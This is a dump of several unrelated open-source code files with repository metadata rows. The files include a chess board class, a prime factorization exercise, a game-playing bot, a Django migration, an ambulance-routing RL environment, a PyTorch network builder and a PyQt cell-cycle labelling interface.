return app.send_static_file('index.html') | gnsensors/website | app.py | app.py | py | 444 | python | en | code | 0 | github-code | 90 |
71940042857 | from Piece import Queen, King, Bishop, Knight, Rook, Pawn
import copy
class Board():
"""
8 ▢▢▢▢▢▢▢▢
▢▢▢▢▢▢▢▢
. ▢▢▢▢▢▢▢▢
. ▢▢▢▢▢▢▢▢
. ▢▢▢▢▢▢▢▢
▢▢▢▢▢▢▢▢
▢▢▢▢▢▢▢▢
1 ▢▢▢▢▢▢▢▢
1 ... 8
(a ... h)
"""
# parent should point at previous position
# children will eventually point at the following positions
def __init__(self, parent=None, debug=None) -> None:
self.parent = parent
self.children = []
if not parent == None:
self.white_pieces = copy.deepcopy(parent.white_pieces)
self.black_pieces = copy.deepcopy(parent.black_pieces)
else:
if parent == None and debug == None:
self.white_pieces = {
(1, 2): Pawn("w", "p"),
(2, 2): Pawn("w", "p"),
(3, 2): Pawn("w", "p"),
(4, 2): Pawn("w", "p"),
(5, 2): Pawn("w", "p"),
(6, 2): Pawn("w", "p"),
(7, 2): Pawn("w", "p"),
(8, 2): Pawn("w", "p"),
(1, 1): Rook("w", "r"),
(2, 1): Knight("w", "n"),
(3, 1): Bishop("w", "b"),
(4, 1): Queen("w", "q"),
(5, 1): King("w", "k"),
(6, 1): Bishop("w", "b"),
(7, 1): Knight("w", "n"),
(8, 1): Rook("w", "r")
}
self.black_pieces = {
(1, 7): Pawn("b", "p"),
(2, 7): Pawn("b", "p"),
(3, 7): Pawn("b", "p"),
(4, 7): Pawn("b", "p"),
(5, 7): Pawn("b", "p"),
(6, 7): Pawn("b", "p"),
(7, 7): Pawn("b", "p"),
(8, 7): Pawn("b", "p"),
(1, 8): Rook("b", "r"),
(2, 8): Knight("b", "n"),
(3, 8): Bishop("b", "b"),
(4, 8): Queen("b", "q"),
(5, 8): King("b", "k"),
(6, 8): Bishop("b", "b"),
(7, 8): Knight("b", "n"),
(8, 8): Rook("b", "r")
}
elif debug == "king":
self.white_pieces = {
(8, 8): King("w", "k")
}
self.black_pieces = {
(1, 1): King("b", "k")
}
else:
raise NotImplementedError
def copy_board(self):
child = Board(parent=self)
self.children.append(child)
return child
| confusedlama/chess | Board.py | Board.py | py | 2,327 | python | en | code | 0 | github-code | 90 |
5908654689 | # Problem description:
# https://github.com/HackBulgaria/Python-101-Forever/tree/master/C01-Python-Basics/24-C01P13
def is_prime(n):
counter = 0
for i in range(1, n + 1):
if n % i == 0:
counter += 1
return counter == 2
def next_prime(n):
n += 1
while not is_prime(n):
n += 1
return n
def prime_factorization(n):
result = []
p = 2
a = 0
while n != 1:
while n % p == 0:
a += 1
n = n // p
if a > 0:
result.append((p, a))
a = 0
p = next_prime(p)
return result
# Expected: [(2, 1), (5, 1)]
print(prime_factorization(10))
| keremidarski/python_playground | Python 101 Forever/C01 - Python Basics/c01p13_prime_factorization.py | c01p13_prime_factorization.py | py | 738 | python | en | code | 0 | github-code | 90 |
37030184751 | import argparse
import os
parser = argparse.ArgumentParser(description='Bpe')
parser.add_argument('--data-dir', type=str, default=None,
help='method for bpe')
args = parser.parse_args()
if __name__ == '__main__':
datasets = os.listdir(args.data_dir)
lang1 = open(os.path.join(args.data_dir, datasets[0]), "r", errors='ignore')
lang2 = open(os.path.join(args.data_dir, datasets[1]), "r", errors='ignore')
with open(os.path.join("./", datasets[0]), 'w') as lang1_writer, \
open(os.path.join("./", datasets[1]), 'w') as lang2_writer:
for line_1, line_2 in zip(lang1.readlines(), lang2.readlines()):
lang1_writer.write(line_1.strip() + "\n")
lang2_writer.write(line_2.strip() + "\n")
| Chris19920210/DipML | preprocess/encode_check.py | encode_check.py | py | 763 | python | en | code | 4 | github-code | 90 |
2713873495 | import Client
import Memento
class Caretaker():
"""
The Caretaker works with all mementos via the base Memento interface.
"""
def __init__(self, Client: Client):
self._mementos = []
self._Client = Client
def backup(self):
self._mementos.append(self._Client.save())
def undo(self):
if not len(self._mementos):
return
memento = self._mementos.pop()
try:
self._Client.restore(memento)
except Exception:
self.undo() | dianabarbo/mementopattern | Caretaker.py | Caretaker.py | py | 533 | python | en | code | 0 | github-code | 90 |
10522601798 | #!/usr/bin/env python3
import sys
import json
import logging
from math import degrees, atan2, tan
logging.basicConfig(filename=r"D:\LibraryOfBabel\Projects\ICPCPlanetoids\MyAdditions\planetoids1.log",
level=logging.DEBUG,
filemode='w',
format='%(message)s')
def get_position_through_void(object_position):
x, y = object_position[0], object_position[1]
return [[x, y], [x+7600, y], [x-7600, y], [x, y+4200], [x, y-4200]]
def get_angle_to_object(object_position, ship_position, ship_rotation):
angle_to_object = degrees(atan2(object_position[1] - ship_position[1], object_position[0] - ship_position[0]))
angle_to_object = angle_to_object if angle_to_object >= 0 else angle_to_object + 360
return angle_to_object - ship_rotation if angle_to_object >= ship_rotation else angle_to_object - ship_rotation + 360
def worm_hole(object_position, ship_position, ship_rotation):
replicated_positions = get_position_through_void(object_position)
distances = [get_dist(pos, ship_position) for pos in replicated_positions]
min_dist = min(distances)
min_dist_index = distances.index(min_dist)
# angles_to_min = [get_angle_to_object(pos, ship_position, ship_rotation) for i, pos in enumerate(replicated_positions) if 0.8 * min_dist <= distances[i] <= 1.2 * min_dist]
angles_to_min = [get_angle_to_object(pos, ship_position, ship_rotation) for i, pos in enumerate(replicated_positions) if distances[i] == min_dist]
sorted_angles = sorted(angles_to_min, key=lambda x: min(x, 360-x))
return sorted_angles[0], min_dist
def get_dist(artifact_position, ship_position):
del_x = artifact_position[0] - ship_position[0]
del_y = artifact_position[1] - ship_position[1]
return (del_x ** 2 + del_y ** 2) ** 0.5
def get_new_artifact_position(object_position, ship_position, ship_rotation):
possible_pos = get_position_through_void(object_position)
distances = [get_dist(pos, ship_position) for pos in possible_pos]
min_dist = min(distances)
min_dist_index = distances.index(min_dist)
return possible_pos[min_dist_index]
def generate_command(thrust,
cw_rotation,
ccw_rotation,
bullet,
hyperspace,
change_state):
if cw_rotation and ccw_rotation:
logging.debug('both clockwise and counterclockwise rotations are enabled')
command = ''
command += '1' if thrust else '0'
command += '1' if cw_rotation else '0'
command += '1' if ccw_rotation else '0'
command += '1' if bullet else '0'
command += '1' if hyperspace else '0'
command += '1' if change_state else '0'
return command
while True:
raw_data = sys.stdin.readline()
if not raw_data:
break
data = json.loads(raw_data)
if "gameOver" in data and data["gameOver"]:
break
thrust, clockwise_rotation, counterclockwise_rotation, bullet, hyperspace, change_state = True, False, False, True, False, True
artifact_position = data['artfPos']
ship_position = data['shipPos']
ship_rotation = data['shipR']
# new_artifact_position = get_new_artifact_position(artifact_position, ship_position, ship_rotation)
# angle_to_artifact = get_angle_to_object(new_artifact_position, ship_position, ship_rotation)
angle_to_artifact, min_dist = worm_hole(artifact_position, ship_position, ship_rotation)
if angle_to_artifact > 5:
if 0 < angle_to_artifact <= 180:
counterclockwise_rotation = True
clockwise_rotation = False
else:
clockwise_rotation = True
counterclockwise_rotation = False
artifact_distance_threshold = 3000
artifact_angle_threshold = 3
# if get_dist(new_artifact_position, ship_position) < artifact_distance_threshold and angle_to_artifact > artifact_angle_threshold:
if min_dist < artifact_distance_threshold and angle_to_artifact > artifact_angle_threshold:
thrust = False
sys.stdout.write(generate_command(thrust, clockwise_rotation, counterclockwise_rotation, bullet, hyperspace, change_state) + "\n")
sys.stdout.flush() | IamMarcIvanov/icpc-gaming-ai-planetoids | planetoids_working_1.py | planetoids_working_1.py | py | 4,324 | python | en | code | 0 | github-code | 90 |
110878862 | plik = open('ciagi.txt')
data = plik.read().splitlines()
halfprime = []
for ciag in data:
liczba = int(ciag ,2)
y = liczba
czynniki = []
i = 2
while i <= y**0.5+1:
if(y%i == 0):
czynniki.append(i)
y //= i
else:
i += 1
if(y > 1):
czynniki.append(y)
if len(czynniki) == 2:
halfprime.append(liczba)
print('ilosc:', len(halfprime))
print('minimalna:', min(halfprime))
print('maksymalna:', max(halfprime)) | dexterowy/matura_inf | 63/63-3.py | 63-3.py | py | 498 | python | pl | code | 1 | github-code | 90 |
44157837319 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('delivery2', '0003_auto_20161126_1937'),
]
operations = [
migrations.CreateModel(
name='MessageRedirectUrl',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True)),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True)),
('delivery', models.ForeignKey(verbose_name='\u0420\u0430\u0441\u0441\u044b\u043b\u043a\u0430', to='delivery2.Delivery')),
('href', models.ForeignKey(verbose_name='Url', blank=True, to='delivery2.EmailUrlTemplate', null=True)),
],
options={
'ordering': ['-created_at'],
'db_table': 'Delivery2_MessageRedirectUrl',
'verbose_name': 'Url',
'verbose_name_plural': 'Urls',
},
),
migrations.RemoveField(
model_name='redirecturl',
name='delivery',
),
migrations.AlterField(
model_name='emailsubject',
name='delivery',
field=models.ForeignKey(related_name='subjects', to='delivery2.Delivery'),
),
migrations.AlterField(
model_name='emailtemplate',
name='delivery',
field=models.ForeignKey(related_name='templates', to='delivery2.Delivery'),
),
migrations.DeleteModel(
name='RedirectUrl',
),
]
| denispan1993/vitaliy | applications/delivery2/migrations/0004_auto_20161128_0016.py | 0004_auto_20161128_0016.py | py | 1,877 | python | en | code | 0 | github-code | 90 |
864993384 | # finally = 예외 발생과 상관없이 항상 실행한다.
try:
inputdata = input(" : ")
numint = int(inputdata)
except:
print('exception')
numint = 0
else:
if numint % 2 == 0:
print ('짝수')
else:
print ( '홀수')
finally:
print(f'{inputdata}')
| jungwonguk/Education | 03.python 중급/31_finally/finally.py | finally.py | py | 310 | python | ko | code | 1 | github-code | 90 |
25713061542 | # Exponential search
x = 3
y = 4
n = 100
def good(t):
return t * x + t * y < n
l = 0
r = 1
step = 1
while good(r):
l = r
r += step
step *= 2
print(l, r)
while l < r - 1:
mid = (l + r) // 2
if good(mid):
l = mid
else:
r = mid
print(l, r) | HornbillFromMinsk/EPIC | Algos/Class Materials/Practice/binary_search_exponential_search.py | binary_search_exponential_search.py | py | 257 | python | en | code | 0 | github-code | 90 |
74808759337 | import sys
#ssys.stdin = open('input.txt','rt')
'''
정다면체
두 개의 정 N면체와 정 M면체의 두 개의 주사위를 던져서 나올 수 있는 눈의 합 중 가장 확
률이 높은 숫자를 출력하는 프로그램을 작성하세요.
정답이 여러 개일 경우 오름차순으로 출력합니다.
▣ 입력설명
첫 번째 줄에는 자연수 N과 M이 주어집니다. N과 M은 4, 6, 8, 12, 20 중의 하나입니다.
▣ 출력설명
첫 번째 줄에 답을 출력합니다.
▣ 입력예제 1
4 6
▣ 출력예제 1
5 6 7
'''
n, m = map(int, input().split())
res = {}
for i in range(1, n+1): # 1~n
for j in range(1, m+1): # 1~m
tmp = i + j # 최대값 : m+n, 최소값 : 2
if tmp not in res.keys(): # Dict에 없으면추가,
res[tmp]=0
res[tmp] += 1
max_val = max(res.values())
for k, v in res.items():
if v == max_val:
print(k, end=' ')
print()
| dpwns523/coding-test-practice | 섹션2/정다면체.py | 정다면체.py | py | 971 | python | ko | code | 0 | github-code | 90 |
21554767920 | '''
Implementation of an RL environment in a discrete graph space.
'''
import numpy as np
import gym
from gym import spaces
import networkx as nx
import math
from .. import env_configs
#------------------------------------------------------------------------------
'''An ambulance environment over a simple graph. An agent interacts through
the environment by [EXPLAIN HOW ENVIRONMENT WORKS HERE] the ambulance. Then
a patient arrives and the ambulance most go and serve the arrival, paying a
cost of travel.'''
class AmbulanceGraphEnvironment(gym.Env):
"""
Custom Environment that follows gym interface.
This is a simple env where the arrivals are uniformly distributed across nodes
"""
metadata = {'render.modes': ['human']}
def __init__(self, config=env_configs.ambulance_graph_default_config):
'''
For a more detailed description of each parameter, see the readme file
epLen - number of time steps
arrival_dist - arrival distribution for calls over nodes
alpha - parameter for proportional difference in costs
edges - edges in the graph and their weights (nodes are automatically inferred)
starting_state - a list containing the starting nodes for each ambulance
num_ambulance - the number of ambulances in the environment
'''
super(AmbulanceGraphEnvironment, self).__init__()
self.config = config
self.epLen = config['epLen']
self.alpha = config['alpha']
self.graph = nx.Graph(config['edges'])
self.num_nodes = self.graph.number_of_nodes()
self.starting_state = config['starting_state']
self.state = self.starting_state
self.timestep = 0
self.num_ambulance = config['num_ambulance']
self.arrival_dist = config['arrival_dist']
self.from_data = config['from_data']
self.lengths = self.find_lengths(self.graph, self.num_nodes)
if self.from_data:
self.arrival_data = config['data']
self.episode_num = 0
# creates an array stored in space_array the length of the number of ambulances
# where every entry is the number of nodes in the graph
num_nodes = self.graph.number_of_nodes()
space_array = np.full(self.num_ambulance, num_nodes)
# creates a space where every ambulance can be located at any of the nodes
self.action_space = spaces.MultiDiscrete(space_array)
# The definition of the observation space is the same as the action space
self.observation_space = spaces.MultiDiscrete(space_array)
def reset(self):
"""
Reinitializes variables and returns the starting state
"""
# Initialize the timestep
self.timestep = 0
self.state = self.starting_state
if self.from_data:
self.episode_num += 1
return self.starting_state
def get_config(self):
return self.config
def step(self, action):
'''
Move one step in the environment
Args:
action - int list - list of nodes the same length as the number of ambulances,
where each entry i in the list corresponds to the chosen location for
ambulance i
Returns:
reward - float - reward based on the action chosen
newState - int list - new state of the system
done - 0/1 - flag for end of the episode
'''
old_state = self.state
# The location of the new arrival is chosen randomly from among the nodes
# in the graph according to the arrival distribution
prob_list = []
if self.from_data:
dataset_step = (self.episode_num * self.epLen + self.timestep) % len(self.arrival_data)
prob_list = self.arrival_dist(dataset_step, self.num_nodes, self.arrival_data)
else:
prob_list = self.arrival_dist(self.timestep, self.num_nodes)
new_arrival = np.random.choice(self.num_nodes, p=prob_list)
# Finds the distance traveled by all the ambulances from the old state to
# the chosen action, assuming that each ambulance takes the shortest path,
# which is stored in total_dist_oldstate_to_action
# Also finds the closest ambulance to the call based on their locations at
# the end of the action, using shortest paths
shortest_length = 999999999
closest_amb_idx = 0
closest_amb_loc = action[closest_amb_idx]
total_dist_oldstate_to_action = 0
for amb_idx in range(len(action)):
new_length = nx.shortest_path_length(self.graph, action[amb_idx], new_arrival, weight='travel_time')
total_dist_oldstate_to_action += nx.shortest_path_length(self.graph, self.state[amb_idx], action[amb_idx], weight='dist')
if new_length < shortest_length:
shortest_length = new_length
closest_amb_idx = amb_idx
closest_amb_loc = action[closest_amb_idx]
else:
continue
# Update the state of the system according to the action taken and change
# the location of the closest ambulance to the call to the call location
newState = np.array(action)
newState[closest_amb_idx] = new_arrival
obs = newState
# The reward is a linear combination of the distance traveled to the action
# and the distance traveled to the call
# alpha controls the tradeoff between cost to travel between arrivals and
# cost to travel to a call
# The reward is negated so that maximizing it will minimize the distance
reward = -1 * (self.alpha * total_dist_oldstate_to_action + (1 - self.alpha) * shortest_length)
# The info dictionary is used to pass the location of the most recent arrival
# so it can be used by the agent
info = {'arrival' : new_arrival}
if self.timestep != (self.epLen-1):
done = False
else:
done = True
self.state = newState
self.timestep += 1
return self.state, reward, done, info
def render(self, mode='console'):
if mode != 'console':
raise NotImplementedError()
def close(self):
pass
def find_lengths(self, graph, num_nodes):
'''
Given a graph, find_lengths first calculates the pairwise shortest distance
between all the nodes, which is stored in a (symmetric) matrix.
'''
dict_lengths = dict(nx.all_pairs_dijkstra_path_length(graph, cutoff=None, weight='travel_time'))
lengths = np.zeros((num_nodes, num_nodes))
for node1 in range(num_nodes):
for node2 in range(num_nodes):
lengths[node1, node2] = dict_lengths[node1][node2]
return lengths | maxsolberg/ORSuite | or_suite/envs/ambulance/ambulance_graph.py | ambulance_graph.py | py | 6,879 | python | en | code | 0 | github-code | 90 |
22659193230 | from collections import OrderedDict
import torch.nn as nn
import math
DEFAULT_LAYER_CONFIG = [
[383, 1024],
[1024, 1024],
[1024, 801]
]
def calculate_bias_bound(weights):
fan_in, _ = nn.init._calculate_fan_in_and_fan_out(weights)
bound = 1 / math.sqrt(fan_in)
return bound
def get_tanh_linear_layer(input_dim, output_dim):
layer = nn.Linear(input_dim, output_dim)
nn.init.xavier_uniform_(layer.weight, gain=nn.init.calculate_gain('tanh'))
bound = calculate_bias_bound(layer.weight)
nn.init.uniform_(layer.bias, -bound, bound)
return layer
def get_relu_linear_layer(input_dim, output_dim):
layer = nn.Linear(input_dim, output_dim)
nn.init.kaiming_uniform_(layer.weight, nonlinearity='relu')
bound = calculate_bias_bound(layer.weight)
nn.init.uniform_(layer.bias, -bound, bound)
return layer
class DNN(nn.Module):
def __init__(self, input_dim, output_dim, layer_config, non_linearity="relu"):
super(DNN, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.layer_config = layer_config
self.non_linearity = non_linearity
self.model = self.compose_model()
def forward(self, batch):
return self.model(batch)
def compose_model(self, layer_config=None):
if layer_config is None:
layer_config = self.layer_config
layers = OrderedDict()
for idx, config in enumerate(layer_config):
input_dim, output_dim = config
if self.non_linearity == "tanh":
layer = get_tanh_linear_layer(input_dim, output_dim)
layers['linear-%d' % idx] = layer
if idx != len(layer_config) - 1:
layers['nonlinear-%d' % idx] = nn.Tanh()
else:
layer = get_relu_linear_layer(input_dim, output_dim)
layers['linear-%d' % idx] = layer
if idx != len(layer_config) - 1:
layers['nonlinear-%d' % idx] = nn.ReLU()
return nn.Sequential(layers)
| teliov/thesislib | thesislib/utils/dl/models.py | models.py | py | 2,082 | python | en | code | 0 | github-code | 90 |
40655067194 | import sys
from PyQt5.QtCore import Qt ,pyqtSignal, QRect
from PyQt5.QtGui import QPalette
from PyQt5.QtWidgets import QProgressBar
import uuid
import pyqtgraph as pg
import pyqtgraph.graphicsItems as pgg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
import imageio
import glob
import cv2
import os
import shutil
from PyQt5.QtWidgets import QApplication, QHBoxLayout, QLabel, QSizePolicy, QSlider, QSpacerItem, \
QVBoxLayout, QWidget, QFileDialog, QPushButton, QInputDialog
from tracking import extractMaskFromPoint
"""
Graphical interface - allow experienced user to label cycle of cells.
All outputs are saved into a folder 'Outputs' within the folder containing the images.
The saved files are:
- cells.csv: a csv file containing the time at which start eache phase. It also contains
the barycenter of the mask associated to the considered cell.
- Outputs/masks: the masks are saved in this folder when computed whith neural network. If masks
are loaded, they ae not saved.
- Outputs/zoom: save crop of images analysed with the interface. If a second channel is given,
they ar saved in the same folder with extension 'channel2_' preceding the name.
Authors: Valentin Debarnot, Léo Lebrat. 17/07/2019.
"""
## Uncomment to force not use GPU.
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = ""
ratioKept = True # Keep ratio of the images display.
type_im = np.uint8 # Format wanted by the neural network.
type_save = np.uint8 # Format of the croped images
minimalSize = 70 # Minimal number of pixel to say a mask is valid.
LSTM = False # Use a LSTM network.
normalize=False
"""
Slider class.
Implement cursor slider and '+' and '-' buttons. Integer value
INPUT
- minimum: minimum value reachable by cursor.
- maximum: maximum value reachable by cursor.
- parent: ?
OUTPUT
QWidget that can take integer values between 'minimum' and 'maximum'
"""
class Slider(QWidget):
valueChangedX = pyqtSignal([int], ['QString'])
def __init__(self, minimum, maximum, parent=None):
super(Slider, self).__init__(parent=parent)
self.verticalLayout = QVBoxLayout(self)
self.label = QLabel(self)
sample_palette = QPalette()
sample_palette.setColor(QPalette.WindowText, Qt.white)
self.label.setPalette(sample_palette)
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QHBoxLayout()
spacerItem = QSpacerItem(0, 5, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.slider = QSlider(self)
self.slider.setOrientation(Qt.Horizontal)
self.horizontalLayout.addWidget(self.slider)
# + button
self.butPlus = QPushButton("+")
self.butPlus.clicked.connect(self.appui_bouton_plus)
self.horizontalLayout.addWidget(self.butPlus)
#- button
self.butMinus = QPushButton("-")
self.butMinus.clicked.connect(self.appui_bouton_minus)
self.horizontalLayout.addWidget(self.butMinus)
spacerItem3 = QSpacerItem(0, 5, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem3)
self.verticalLayout.addLayout(self.horizontalLayout)
self.resize(self.sizeHint())
self.minimum = minimum
self.maximum = maximum
self.slider.valueChanged.connect(self.setLabelValue)
self.x = None
self.setLabelValue(self.slider.value())
def setLabelValue(self, value):
self.x = self.minimum + int((float(value) / (self.slider.maximum() - self.slider.minimum())) * (
self.maximum - self.minimum))
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
def appui_bouton_plus(self):
if self.x < self.maximum:
self.x += 1
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
def appui_bouton_minus(self):
if self.x > self.minimum:
self.x -= 1
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
"""
Slider class.
Implement cursor slider. Float value.
INPUT
- minimum: minimum value reachable by cursor.
- maximum: maximum value reachable by cursor.
- parent: ?
OUTPUT
QWidget that can take float values between 'minimum' and 'maximum'
"""
class Slider_thresh(QWidget):
    """Float-valued slider widget: a cursor plus '+'/'-' step buttons.

    The current value is kept in ``self.x`` (a float in
    [``minimum``, ``maximum``]) and broadcast through the ``valueChangedX``
    signal every time it changes.  The label always displays the value with
    a "thresh: " prefix.
    """
    # Emitted with the new float value each time self.x changes.
    valueChangedX = pyqtSignal([float], ['QString'])
    def __init__(self, minimum, maximum, parent=None):
        """Build the widget.

        Args:
            minimum (float): minimum value reachable by the cursor.
            maximum (float): maximum value reachable by the cursor.
            parent: optional parent QWidget.
        """
        super(Slider_thresh, self).__init__(parent=parent)
        self.verticalLayout = QVBoxLayout(self)
        self.label = QLabel(self)
        # White text so the value label stays readable on a dark background.
        sample_palette = QPalette()
        sample_palette.setColor(QPalette.WindowText, Qt.white)
        self.label.setPalette(sample_palette)
        self.verticalLayout.addWidget(self.label)
        self.horizontalLayout = QHBoxLayout()
        spacerItem = QSpacerItem(0, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        self.slider = QSlider(self)
        self.slider.setOrientation(Qt.Horizontal)
        self.horizontalLayout.addWidget(self.slider)
        spacerItem1 = QSpacerItem(0, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem1)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.resize(self.sizeHint())
        self.minimum = minimum
        self.maximum = maximum
        # Any slider move re-maps the raw position into [minimum, maximum].
        self.slider.valueChanged.connect(self.setLabelValue)
        self.x = None
        # Initialize self.x at the midpoint of the range.
        # NOTE(review): the slider handle itself is not moved, so it keeps
        # its default position until the user drags it — confirm intended.
        self.setLabelValue(0.5*(self.slider.maximum() - self.slider.minimum()))
        # '+' button: steps the value up by 0.1.
        self.butPlus = QPushButton("+")
        self.butPlus.clicked.connect(self.appui_bouton_plus)
        self.horizontalLayout.addWidget(self.butPlus)
        # '-' button: steps the value down by 0.1.
        self.butMinus = QPushButton("-")
        self.butMinus.clicked.connect(self.appui_bouton_minus)
        self.horizontalLayout.addWidget(self.butMinus)
        spacerItem3 = QSpacerItem(0, 5, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem3)
    def setLabelValue(self, value):
        """Map the raw slider position to a float in [minimum, maximum],
        store it in self.x, emit valueChangedX and refresh the label."""
        self.x = self.minimum + ((float(value) / (self.slider.maximum() - self.slider.minimum())) * (self.maximum - self.minimum))
        self.valueChangedX.emit(self.x)
        self.label.setText("thresh: {0:.4g}".format(self.x))
    def appui_bouton_plus(self):
        """'+' button handler: step the value up by 0.1, clamped to maximum."""
        if self.x < self.maximum:
            # Clamp so a 0.1 step can never push the value past the maximum
            # (the original could overshoot, e.g. 0.95 -> 1.05 with max 1.0).
            self.x = min(self.x + 0.1, self.maximum)
            self.valueChangedX.emit(self.x)
            # Keep the same "thresh: " prefix as setLabelValue (the original
            # dropped it here, leaving the label inconsistent).
            self.label.setText("thresh: {0:.4g}".format(self.x))
    def appui_bouton_minus(self):
        """'-' button handler: step the value down by 0.1, clamped to minimum."""
        if self.x > self.minimum:
            # Clamp so a 0.1 step can never push the value below the minimum.
            self.x = max(self.x - 0.1, self.minimum)
            self.valueChangedX.emit(self.x)
            self.label.setText("thresh: {0:.4g}".format(self.x))
"""
Implement buttons to manage interface.
The buttons made are:
- Quit: quit the application.
- Channel: load other image (other chanel), and save croped images in all channels.
- start and end tracking: start and end save crop of selected mask.
"""
class InterfaceManagerButton(QWidget):
    """Toolbar exposing the interface-management actions.

    Each button logs the action to stdout and re-emits it as a Qt signal:
      - "Quit"          -> ``isQuit``
      - "Add channel"   -> ``isChannel``
      - "Save crop"     -> ``isTrack``
      - "End save crop" -> ``isTrackEnd``
    """
    isQuit = pyqtSignal()
    isChannel = pyqtSignal()
    isTrack = pyqtSignal()
    isTrackEnd = pyqtSignal()

    def __init__(self, parent=None):
        super(InterfaceManagerButton, self).__init__(parent=parent)
        self.verticalLayout = QVBoxLayout(self)
        self.horizontalLayout = QHBoxLayout()
        self.butQuit = self._add_button("Quit", self.quitImage)
        self.butChannel = self._add_button("Add channel", self.channelImage)
        stretch = QSpacerItem(0, 0.5, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(stretch)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.resize(self.sizeHint())
        self.butTrack = self._add_button("Save crop", self.trackImage)
        self.butTrackEnd = self._add_button("End save crop", self.trackEndImage)

    def _add_button(self, text, slot):
        """Create a QPushButton wired to *slot* and append it to the toolbar row."""
        button = QPushButton(text)
        button.clicked.connect(slot)
        self.horizontalLayout.addWidget(button)
        return button

    # Click handlers: log the action, then re-emit it as a Qt signal.
    def quitImage(self):
        print("Quit")
        self.isQuit.emit()

    def channelImage(self):
        print("Adding new channel")
        self.isChannel.emit()

    def trackImage(self):
        print("Start saving crop")
        self.isTrack.emit()

    def trackEndImage(self):
        print("End saving crop")
        self.isTrackEnd.emit()
"""
Implement bottom buttons.
The buttons made are:
- Shoot: use to start shooting procedure, i.e. following barycenter of mask into the ROI defined.
- Unshoot: refresh ROI selection.
- G1, eraly S, mid S, late S, G2, end tracking: use to defined phases of interest of the cell follow
by the shooting procedure.
"""
class BottomBut(QWidget):
    """Bottom button bar: shooting control, mask loading and phase tagging.

    Each button logs its action and re-emits it as a Qt signal so the main
    Widget can react (the signals are connected in ``Widget.__init__``).
    """
    isShooted = pyqtSignal()
    isunShooted = pyqtSignal()
    isG1 = pyqtSignal()
    isEarlyS = pyqtSignal()
    isMidS = pyqtSignal()
    isLateS = pyqtSignal()
    isG2 = pyqtSignal()
    isEnd = pyqtSignal()
    isloadMasks = pyqtSignal()
    iscomputeMasks = pyqtSignal()

    def __init__(self, parent=None):
        super(BottomBut, self).__init__(parent=parent)
        self.verticalLayout = QVBoxLayout(self)
        self.horizontalLayout = QHBoxLayout()
        # Shoot / un-shoot controls.
        self.butShoot = QPushButton("᪠ Shoot")
        self.butShoot.clicked.connect(self.shoot)
        self.horizontalLayout.addWidget(self.butShoot)
        self.butunShoot = QPushButton("᳁ Un-Shoot")
        self.butunShoot.clicked.connect(self.unshoot)
        self.horizontalLayout.addWidget(self.butunShoot)
        spacerItem = QSpacerItem(0, 0.5, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        # Mask management.
        self.butloadMasks = QPushButton("Load masks")
        self.butloadMasks.clicked.connect(self.loadMasks)
        self.horizontalLayout.addWidget(self.butloadMasks)
        self.butcomputeMasks = QPushButton("Compute masks")
        self.butcomputeMasks.clicked.connect(self.computeMasks)
        self.horizontalLayout.addWidget(self.butcomputeMasks)
        spacerItem = QSpacerItem(0, 1, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        # Cell-cycle phase buttons.
        self.butG1 = QPushButton("ᛰ G1")
        self.butG1.clicked.connect(self.G1)
        self.horizontalLayout.addWidget(self.butG1)
        self.butEarlyS = QPushButton("ᛰ early S")
        self.butEarlyS.clicked.connect(self.earlyS)
        self.horizontalLayout.addWidget(self.butEarlyS)
        self.butMidS = QPushButton("ᛰ mid S")
        self.butMidS.clicked.connect(self.midS)
        self.horizontalLayout.addWidget(self.butMidS)
        self.butLateS = QPushButton("ᛰ late S")
        self.butLateS.clicked.connect(self.lateS)
        self.horizontalLayout.addWidget(self.butLateS)
        self.butG2 = QPushButton("ᛰ G2")
        self.butG2.clicked.connect(self.G2)
        self.horizontalLayout.addWidget(self.butG2)
        self.butEnd = QPushButton("ᛰ end Tracking")
        self.butEnd.clicked.connect(self.ending)
        self.horizontalLayout.addWidget(self.butEnd)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.resize(self.sizeHint())

    # Click handlers: log the action, then re-emit it as a Qt signal.
    def shoot(self):
        print("shoot -- May take few seconds...")
        self.isShooted.emit()

    def unshoot(self):
        print("unshoot")
        self.isunShooted.emit()

    def G1(self):
        print("G1")
        self.isG1.emit()

    def earlyS(self):
        print("Early S")
        self.isEarlyS.emit()

    def midS(self):
        print("mid S")
        self.isMidS.emit()

    def lateS(self):
        print("Late S")
        self.isLateS.emit()

    def G2(self):
        print("G2")
        self.isG2.emit()

    def ending(self):
        print('end')
        self.isEnd.emit()

    def loadMasks(self):
        # BUG FIX: previously printed "shoot" (copy-paste error).
        print("load masks")
        self.isloadMasks.emit()

    def computeMasks(self):
        # BUG FIX: previously printed "shoot" (copy-paste error).
        print("compute masks")
        self.iscomputeMasks.emit()
